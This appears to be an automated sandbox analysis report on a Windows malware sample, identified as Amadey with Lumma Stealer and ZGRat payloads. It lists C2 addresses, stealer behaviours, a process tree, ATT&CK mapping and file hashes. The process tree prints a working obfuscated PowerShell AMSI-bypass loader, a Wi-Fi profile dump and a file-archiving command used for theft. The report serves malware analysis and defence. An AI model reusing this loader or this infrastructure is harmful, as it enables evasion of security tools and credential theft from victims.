Analysis

  • max time kernel
    105s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-03-2024 19:28

General

  • Target

    8aef035c335a85f8bf059415a083de656ba40eb4def09bdf0b6ac7ca359dd5f9.exe

  • Size

    1.8MB

  • MD5

    06239818e73dd2991083abc50770507e

  • SHA1

    2c739947acbc1e543fc2bead6b1bc2c96de8e756

  • SHA256

    8aef035c335a85f8bf059415a083de656ba40eb4def09bdf0b6ac7ca359dd5f9

  • SHA512

    9bf6e2ba7fd6b036b6ed431c33fa9f4c2843e694b39374c53ce2f43f9adf1e96333f2e50da4fec17869c226231948c70919e8699667058371ab79dd2ee70ace9

  • SSDEEP

    24576:zCo+vNs7ujeryReuhAoc7+uHIcKHmVzvfzSsrbBc0Z4GWPpSvSwfSvxJfVboRisM:zCvNtjKyeVJV6sO0CTzvxoRiR5H

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

lumma

C2

https://enthusiasimtitleow.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 32 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:392
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{20c9418b-2ba8-4342-890f-f16e20df1dc8}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2268
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:740
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1044
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1108
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1136
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1144
                    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      2⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:3016
                      • C:\Users\Admin\AppData\Local\Temp\1001063001\Jsholum.exe
                        "C:\Users\Admin\AppData\Local\Temp\1001063001\Jsholum.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1948
                        • C:\Users\Admin\AppData\Local\Temp\$77424a29
                          "C:\Users\Admin\AppData\Local\Temp\$77424a29"
                          4⤵
                          • Executes dropped EXE
                          PID:4720
                        • C:\Users\Admin\AppData\Local\Temp\$77b042c4
                          "C:\Users\Admin\AppData\Local\Temp\$77b042c4"
                          4⤵
                          • Executes dropped EXE
                          PID:3604
                      • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                        "C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:3604
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1264
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 872
                          4⤵
                          • Program crash
                          PID:5052
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                        3⤵
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4060
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3452
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            5⤵
                              PID:4512
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\270530367132_Desktop.zip' -CompressionLevel Optimal
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4616
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          3⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          PID:1696
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GQRfecTTQNtL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ptGJYwdMwtbHDs,[Parameter(Position=1)][Type]$HVBLZyLpTT)$jvtAMgLOsOf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+'eg'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$jvtAMgLOsOf.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ptGJYwdMwtbHDs).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'n'+'a'+''+'g'+''+'e'+''+'d'+'');$jvtAMgLOsOf.DefineMethod(''+'I'+''+'n'+'vo'+'k'+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+''+'d'+''+'e'+''+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+','+'N'+''+'e'+''+'w'+''+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$HVBLZyLpTT,$ptGJYwdMwtbHDs).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $jvtAMgLOsOf.CreateType();}$mWdESnerHuXSi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+[Char](109)+''+'.'+'d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+'eN'+'a'+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+'Met'+[Char](104)+''+[Char](111)+'d'+'s'+'');$NUqAYsSGbctjUw=$mWdESnerHuXSi.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$APgXPWutnWJTJDWkBSS=GQRfecTTQNtL @([String])([IntPtr]);$fggwtxYwhErJkpKoWnDKTa=GQRfecTTQNtL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$csgRmhxWxyX=$mWdESnerHuXSi.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$PgXrUvOpCZjFgw=$NUqAYsSGbctjUw.Invoke($Null,@([Object]$csgRmhxWxyX,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$dqLzCtbDiUMkeXjFR=$NUqAYsSGbctjUw.Invoke($Null,@([Object]$csgRmhxWxyX,[Object](''+'V'+'i'+'r'+'tua'+'l'+''+[Char](80)+'ro'+'t'+''+[Char](101)+''+[Char](99)+'t')));$uBZJMlO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PgXrUvOpCZjFgw,$APgXPWutnWJTJDWkBSS).Invoke(''+[Char](97)+''+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$irEVQWGOOJepRasTB=$NUqAYsSGbctjUw.Invoke($Null,@([Object]$uBZJMlO,[Object](''+[Char](65)+'msi'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+'e'+[Char](114)+'')));$BlopJENkyn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dqLzCtbDiUMkeXjFR,$fggwtxYwhErJkpKoWnDKTa).Invoke($irEVQWGOOJepRasTB,[uint32]8,4,[ref]$BlopJENkyn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$irEVQWGOOJepRasTB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dqLzCtbDiUMkeXjFR,$fggwtxYwhErJkpKoWnDKTa).Invoke($irEVQWGOOJepRasTB,[uint32]8,0x20,[ref]$BlopJENkyn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+'T'+'WA'+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2960
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1180
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1244
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1280
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1320
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1428
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1440
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2580
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1232
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2356
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:3964
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:876
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:4492
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1568
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                1⤵
                                                  PID:1580
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1672
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                    1⤵
                                                      PID:1680
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                      1⤵
                                                        PID:1736
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        1⤵
                                                          PID:1772
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1812
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                            1⤵
                                                              PID:1928
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                              1⤵
                                                                PID:1988
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:2000
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                  1⤵
                                                                    PID:1732
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                      PID:1824
                                                                    • C:\Windows\System32\spoolsv.exe
                                                                      C:\Windows\System32\spoolsv.exe
                                                                      1⤵
                                                                        PID:2128
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2712
                                                                        • C:\Users\Admin\AppData\Local\Temp\8aef035c335a85f8bf059415a083de656ba40eb4def09bdf0b6ac7ca359dd5f9.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\8aef035c335a85f8bf059415a083de656ba40eb4def09bdf0b6ac7ca359dd5f9.exe"
                                                                          1⤵
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Checks BIOS information in registry
                                                                          • Identifies Wine through registry keys
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Drops file in Windows directory
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3532
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3604 -ip 3604
                                                                          1⤵
                                                                            PID:2400

                                                                          Network

                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                          Persistence

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Privilege Escalation

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Defense Evasion

                                                                          Virtualization/Sandbox Evasion

                                                                          2
                                                                          T1497

                                                                          Modify Registry

                                                                          1
                                                                          T1112

                                                                          Credential Access

                                                                          Unsecured Credentials

                                                                          5
                                                                          T1552

                                                                          Credentials In Files

                                                                          4
                                                                          T1552.001

                                                                          Credentials in Registry

                                                                          1
                                                                          T1552.002

                                                                          Discovery

                                                                          Query Registry

                                                                          5
                                                                          T1012

                                                                          Virtualization/Sandbox Evasion

                                                                          2
                                                                          T1497

                                                                          System Information Discovery

                                                                          3
                                                                          T1082

                                                                          Collection

                                                                          Data from Local System

                                                                          5
                                                                          T1005

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                            Filesize

                                                                            1.8MB

                                                                            MD5

                                                                            06239818e73dd2991083abc50770507e

                                                                            SHA1

                                                                            2c739947acbc1e543fc2bead6b1bc2c96de8e756

                                                                            SHA256

                                                                            8aef035c335a85f8bf059415a083de656ba40eb4def09bdf0b6ac7ca359dd5f9

                                                                            SHA512

                                                                            9bf6e2ba7fd6b036b6ed431c33fa9f4c2843e694b39374c53ce2f43f9adf1e96333f2e50da4fec17869c226231948c70919e8699667058371ab79dd2ee70ace9

                                                                          • C:\Users\Admin\AppData\Local\Temp\1001063001\Jsholum.exe
                                                                            Filesize

                                                                            2.4MB

                                                                            MD5

                                                                            93e590ddbf788288603f6e3732b08ab9

                                                                            SHA1

                                                                            6b6d66ecff1ca546f3a63d038cacf21d84ae5577

                                                                            SHA256

                                                                            01eee1eccb32c1a97ca03c8d5dde19c6ad6fa6a840d55ba9c88baa5aa57891d1

                                                                            SHA512

                                                                            a699c2514c75433170c2b3d85b7130500c2efc9123e01f4b749f6c599d7ae341573dd3326558f23a362586e0b7915f1072cb84378c1ddf968e87083aa0b45f81

                                                                          • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                                                                            Filesize

                                                                            379KB

                                                                            MD5

                                                                            90f41880d631e243cec086557cb74d63

                                                                            SHA1

                                                                            cb385e4172cc227ba72baf29ca1c4411fa99a26d

                                                                            SHA256

                                                                            23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

                                                                            SHA512

                                                                            eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gesxw4kz.k1p.ps1
                                                                            Filesize

                                                                            60B

                                                                            MD5

                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                            SHA1

                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                            SHA256

                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                            SHA512

                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                          • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                                                                            Filesize

                                                                            109KB

                                                                            MD5

                                                                            2afdbe3b99a4736083066a13e4b5d11a

                                                                            SHA1

                                                                            4d4856cf02b3123ac16e63d4a448cdbcb1633546

                                                                            SHA256

                                                                            8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

                                                                            SHA512

                                                                            d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

                                                                          • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
                                                                            Filesize

                                                                            1.2MB

                                                                            MD5

                                                                            92fbdfccf6a63acef2743631d16652a7

                                                                            SHA1

                                                                            971968b1378dd89d59d7f84bf92f16fc68664506

                                                                            SHA256

                                                                            b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                                                                            SHA512

                                                                            b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                                                                          • memory/616-5064-0x000001F70E6B0000-0x000001F70E6D5000-memory.dmp
                                                                            Filesize

                                                                            148KB

                                                                          • memory/616-5073-0x00007FFE01A4D000-0x00007FFE01A4E000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/676-5091-0x00007FFE01A4C000-0x00007FFE01A4D000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/676-5089-0x00007FFE01A4F000-0x00007FFE01A50000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/676-5087-0x00007FFE01A4D000-0x00007FFE01A4E000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/1264-145-0x0000000002A60000-0x0000000004A60000-memory.dmp
                                                                            Filesize

                                                                            32.0MB

                                                                          • memory/1264-151-0x0000000002A60000-0x0000000004A60000-memory.dmp
                                                                            Filesize

                                                                            32.0MB

                                                                          • memory/1264-136-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                            Filesize

                                                                            304KB

                                                                          • memory/1264-132-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                            Filesize

                                                                            304KB

                                                                          • memory/1264-153-0x0000000000E10000-0x0000000000E11000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/1264-156-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                            Filesize

                                                                            304KB

                                                                          • memory/1264-745-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                            Filesize

                                                                            304KB

                                                                          • memory/1948-88-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-115-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-48-0x00000000730E0000-0x0000000073890000-memory.dmp
                                                                            Filesize

                                                                            7.7MB

                                                                          • memory/1948-49-0x0000000005960000-0x0000000005BA2000-memory.dmp
                                                                            Filesize

                                                                            2.3MB

                                                                          • memory/1948-50-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-51-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-53-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-55-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-57-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-59-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-61-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-63-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-65-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-67-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-69-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-71-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-73-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-1535-0x00000000730E0000-0x0000000073890000-memory.dmp
                                                                            Filesize

                                                                            7.7MB

                                                                          • memory/1948-75-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-86-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-5017-0x0000000005D50000-0x0000000005D51000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/1948-90-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-100-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-103-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-105-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-107-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-109-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-111-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-113-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

